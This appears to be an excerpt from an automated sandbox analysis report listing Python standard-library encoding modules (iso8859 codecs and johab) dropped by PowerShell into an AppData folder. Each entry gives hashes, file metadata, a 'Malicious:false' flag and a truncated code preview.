                                                                                                                                                                                                  SHA-256:76216C65399DE88B6D40E0BE3209ED7B14D6DD87AFB9C0A984ADDDD0CF6B559F
                                                                                                                                                                                                  SHA-512:13A368308279E76F2D6C3AEF73B66AD4EF4A5A88098FF1A85B403C3C006B3925E25BBB72A6BAC1585CF90D60CF26ADE576CCE484A65E1AE0EC52467370D0507C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_10 generated from 'MAPPINGS/ISO8859/8859-10.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-10',.. enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_11.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12642
                                                                                                                                                                                                  Entropy (8bit):4.621611083140247
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:gHhsuOTDvRrUrXPLouhIAs2+ijLA00pC8i5I:dTpuhIAlBH8iG
                                                                                                                                                                                                  MD5:8BE69EAC235E74EFCA68174DB8EA6352
                                                                                                                                                                                                  SHA1:28447A4EC5A2111A8B370DECD143F45935EBC454
                                                                                                                                                                                                  SHA-256:5E346F5769E0C3EEB6B5547B954481A821481A970AA8FEC33BFFBF07B880689A
                                                                                                                                                                                                  SHA-512:2E4CB687855A577BDBA8665767BFDD29E95D0952C10C0DA9C2547659629C6DBCD7A95E9C821A1CED7CA4BE5600A95BAEA1D5383AFC9A491E3861A344F1FFAEFB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_11 generated from 'MAPPINGS/ISO8859/8859-11.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-11',.. enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_13.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13578
                                                                                                                                                                                                  Entropy (8bit):4.614312894970411
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:oHhsuOTDvRNUrXPLouhIAs2+ijLdyGeyd:1TXuhIAlQGeG
                                                                                                                                                                                                  MD5:89E3297E11801E02B40A23B6180DCD25
                                                                                                                                                                                                  SHA1:EB58BC97EEE69D9DB6670CD439C684057B7A3937
                                                                                                                                                                                                  SHA-256:BEE45734B991C04E76C2ABA2BA8C7208F6BA743324D815DE95965945643D8084
                                                                                                                                                                                                  SHA-512:F8AF2186EC0C3CE5B391999280086ADFD3882425269ECFBCA4D70A33907CE42A1F8F6949D9BE2937FB92300A8235667611DECD358C7E0F8273858B72ADF56CB3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_13 generated from 'MAPPINGS/ISO8859/8859-13.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-13',.. enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_14.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13959
                                                                                                                                                                                                  Entropy (8bit):4.584053979506915
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:mHhsuOTDvR0UrXPLouhIAs2+ijLXwwTdW:DTKuhIAlvwkW
                                                                                                                                                                                                  MD5:445A9BD974736A30077C9BF14106E805
                                                                                                                                                                                                  SHA1:85E673B1E179E5886765F6051ED2F9235063F2F8
                                                                                                                                                                                                  SHA-256:C498772FADF244077B650E468E7922AE1C0DB74ED6984A2A81BC0E088631F0F9
                                                                                                                                                                                                  SHA-512:0D8D322C1DCCB5F2169F402CB82875A10D725F65DFBDE6E70515839CFC8451DD58DD5F938AED1DE25A2C1E74ACEADC7E07889F81C98808ECDE2F6F24D5C73D89
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_14 generated from 'MAPPINGS/ISO8859/8859-14.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-14',.. enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_15.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13519
                                                                                                                                                                                                  Entropy (8bit):4.566581461339518
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:QHhsuOTDvRnUrXPLouhIAs2+ijLhFsVN6ATdo56G:NTNuhIAl5Fsto
                                                                                                                                                                                                  MD5:0D2C4FB1B7CCD0D085108F651A041593
                                                                                                                                                                                                  SHA1:947AF7C07B789EB743031C3C108BB2FDB882F673
                                                                                                                                                                                                  SHA-256:D703D64AE2D23602E38C2F387EEFFD5D4E5792209BC3CE64928FEE2F99DCD906
                                                                                                                                                                                                  SHA-512:3B24DE05424FBEFC09C8B3743DEA37C4AFEDE5C68A96D0721622D28A6AD42B47D2BB28011F39E6B89AD14B893DB545572537EC741090B880414C26CDF8845EDA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_15 generated from 'MAPPINGS/ISO8859/8859-15.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-15',.. enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_16.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13864
                                                                                                                                                                                                  Entropy (8bit):4.596808715275571
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:fiHhsuOTDvRf+UrXPLouhIAs2+ijLOSVCXKm:fvT4uhIAlznm
                                                                                                                                                                                                  MD5:6ED16EE5F05DE02F25349CEBA19AFF51
                                                                                                                                                                                                  SHA1:B036FA26C737669AB311D450BE274CE57845EB9C
                                                                                                                                                                                                  SHA-256:F49FFF248546D510F7ECB5FC2C25C9B68925A2F483B938035CD7A54957A560A2
                                                                                                                                                                                                  SHA-512:18FFEC059B44077627A86139D2861509E28DC8564FC9B5F822C79E21E8A43043780469221B66743D5BFEF84552C3F787E25B721B87B2422A0AFCBCEC84953AE8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_16 generated from 'MAPPINGS/ISO8859/8859-16.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-16',.. enc

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_2.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13711
                                                                                                                                                                                                  Entropy (8bit):4.594295226318269
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:eHhsuOTDvR1UrXPLouhIAs2+ijLRG3RKjV:rTLuhIAlw4V
                                                                                                                                                                                                  MD5:62DC1A7320D0B8FB3FB535E0F2055446
                                                                                                                                                                                                  SHA1:02D0C9E5D224A0C6036C27C842EC54E3962681C3
                                                                                                                                                                                                  SHA-256:D9102AE464030E5A0F4D1712435AC3BDB2FA98ECAA689B5965442EF92B13DFEC
                                                                                                                                                                                                  SHA-512:29D58449D2B6216C9BB40E151E0133FC370D104C07C6960581B914495C8940B2B7C7B85E70514EB0D37313854A8EC2BDC3163406881B4521262CEBF26A385EAE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_2 generated from 'MAPPINGS/ISO8859/8859-2.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-2',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_3.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13396
                                                                                                                                                                                                  Entropy (8bit):4.597193229637006
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uHhsuOTDvRCUrXPLouhIAs2+ijLA/SI7JbrO:7TIuhIAltIBC
                                                                                                                                                                                                  MD5:79D790F88E256CC8C968456344519BAB
                                                                                                                                                                                                  SHA1:6EA401BBD3082D55BA2235D768A80BEA52E4759A
                                                                                                                                                                                                  SHA-256:E372E25B32E8657DB9B57B3C9B53D68B67F3FC6651C53B071DCAC6CAB6662FCA
                                                                                                                                                                                                  SHA-512:EDB436E11FE172A73DD899E163F3D05D1DB6214755FCCCD7311A1923EF5EE8F7530D353D1EEB9BE8B9E435F250509CD114CE540BC4F928B32000A64E05EB4E9C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_3 generated from 'MAPPINGS/ISO8859/8859-3.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-3',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_4.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13683
                                                                                                                                                                                                  Entropy (8bit):4.589930243244332
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:yHhsuOTDvRvUrXPLouhIAs2+ijL4Eo6z+:/T5uhIAlhb+
                                                                                                                                                                                                  MD5:4C0E2E5478CFC6B2A8134D5C5D3C76ED
                                                                                                                                                                                                  SHA1:73749BA58832D716683A2F76354BB032A3123E78
                                                                                                                                                                                                  SHA-256:164C26A1A13DC22A21A7F80E5C0176EA9223111B759D2ED1CD8B3C55AAB63BBD
                                                                                                                                                                                                  SHA-512:C469837BC68A419D91FD8EB0D52A2164D557C3EEBDA6E7F2B1040D18DFC6F94BDA827CFAC0EF44BF8F19DDE6B732A9AF3A48214EE0AFB143600D3D77E98F1C59
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_4 generated from 'MAPPINGS/ISO8859/8859-4.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-4',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_5.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13322
                                                                                                                                                                                                  Entropy (8bit):4.619153100357495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:iHhsuOTDvRcUrXPLouhIAs2+ijL762Y+n:vT2uhIAlT62n
                                                                                                                                                                                                  MD5:70CB514B7CD7B9A494A55CB257553431
                                                                                                                                                                                                  SHA1:7F689F78B422164FDA39F897B45AAE7C8CCFE8DB
                                                                                                                                                                                                  SHA-256:4622BB45469E23C852698A6B784B5E28AFD8072FDDB8E319C02D39B138CB9DBE
                                                                                                                                                                                                  SHA-512:CCCA6974D74B32643D84198A626C28A6CC777B3D9853C90FDE3F61D54F8A41ED3C423CE2795402E6157A1529985C91E56B1D2C944EF3222E54CA8D2A232C0D6D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_5 generated from 'MAPPINGS/ISO8859/8859-5.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-5',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_6.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11140
                                                                                                                                                                                                  Entropy (8bit):4.629970059245577
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:+HhsuOTDvRhUrXPLouhIAs2+ijLeCdxeiu5iEp30yfZn:LTnuhIAlUH
                                                                                                                                                                                                  MD5:A69D78A4C1AB4134DC5033FA45821AAE
                                                                                                                                                                                                  SHA1:C0B9008772067BF43B1A817780D6B86DFCD87EF8
                                                                                                                                                                                                  SHA-256:1543F9AD8DCC4AA912C5C901A5A216A4EA3DB62FB19197A0D90CCC0EE69B4538
                                                                                                                                                                                                  SHA-512:230E26A9366387FAE38340921C675D3AD3CD8580096824842FA9261EB1BBA391E399525425030854FAA9F84819E57F7F9F238426B809274A6D78676143AC9F3B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_6 generated from 'MAPPINGS/ISO8859/8859-6.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-6',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_7.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13151
                                                                                                                                                                                                  Entropy (8bit):4.649031466938632
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:+HhsuOTDvReUrXPLouhIAs2+ijLEARfO21XHHjfvK8uHZh:LTEuhIAl8AN11XO8Aj
                                                                                                                                                                                                  MD5:50BFFF8D67F78DF6B9941AD829159358
                                                                                                                                                                                                  SHA1:D766C9E1E2EA76FB3CA67793F36A3F45C1545132
                                                                                                                                                                                                  SHA-256:41FEB2BEC72E3F07C0D67F0E421FF8E51A8E1688AA20AF7C8A12CE0DDF464104
                                                                                                                                                                                                  SHA-512:00EEA3F1B69FA47E0DA4B7AC0E4AD0E8830A6A3E845B3D340A4ACB4DB0838D01423B4FFAD94863178ECAD72FA1053868CE506C5AF3C010C76A29D11F2BB992C5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_7 generated from 'MAPPINGS/ISO8859/8859-7.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-7',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_8.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11343
                                                                                                                                                                                                  Entropy (8bit):4.621650787612196
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:aHhsuOTDvR7UrXPLouhIAs2+ijLUSj6ZZPHxvi:3TluhIAlcSv
                                                                                                                                                                                                  MD5:E873B80A7B474B64BA463354A5D1A39A
                                                                                                                                                                                                  SHA1:58682E0EF443927AC206F8C0B70FB2636DD1C2C2
                                                                                                                                                                                                  SHA-256:63D11B2592BDB036C8F4150EC1F968D1A6E01D22AF8D7DAF94F6C72E0A8FD752
                                                                                                                                                                                                  SHA-512:185EA3AD52F3CE519171B5CBBB5BF7071C009A800121F368CD06118F1A82D37BA2A5526118D6A8B1117C5C9AD31699BD657903CDA9C4A25D6BB7D192C643C717
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_8 generated from 'MAPPINGS/ISO8859/8859-8.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-8',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\iso8859_9.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13463
                                                                                                                                                                                                  Entropy (8bit):4.569353880954753
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:KHhsuOTDvRIUrXPLouhIAs2+ijLMZt6B5TdjN:nTiuhIAlEZt69x
                                                                                                                                                                                                  MD5:CAD4BC52AF4F5E24614AC8857D21DC35
                                                                                                                                                                                                  SHA1:49BDA77039C166194660CAF30885E17951603F3E
                                                                                                                                                                                                  SHA-256:FD0CCFDE95FCFEBF48BA5ED5F697C4799C3303B853077F48FFEF2FD9EF1E30C8
                                                                                                                                                                                                  SHA-512:6CBDC2C1F97DB4A9A1BFD1D1601C55F946C82BB5AE2844DDECC98A1B760B7EB292EA393DFD2A1D45BA99906397861BF01E1C0C3430D8285B517724F06F19D10E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_9 generated from 'MAPPINGS/ISO8859/8859-9.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-9',.. encode

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\johab.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1062
                                                                                                                                                                                                  Entropy (8bit):4.530496029691674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:nNqxOzSf/XokTZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj92FcJxFpz:Nqyzqt62VJjRU8njOxLnrxLbrLK8+Jx/
                                                                                                                                                                                                  MD5:161F7EEDD0B4169D0A36DA2E7808EB7B
                                                                                                                                                                                                  SHA1:35D8869963DBB870A4B9DF3C974DE9A5CF5F4E41
                                                                                                                                                                                                  SHA-256:C83AA2098AB15FBAD7EB999C303B27350B0459EE9F6FC2B2BF4004D4285F9E8D
                                                                                                                                                                                                  SHA-512:5219805C9AF0799449BA650FE4108B450A20A3864AC5CD7ADA83A5C2429F9604025E8F1F296A461600E73372779838971AB91F150060761597D670B4AB9ED531
                                                                                                                                                                                                  Malicious:false
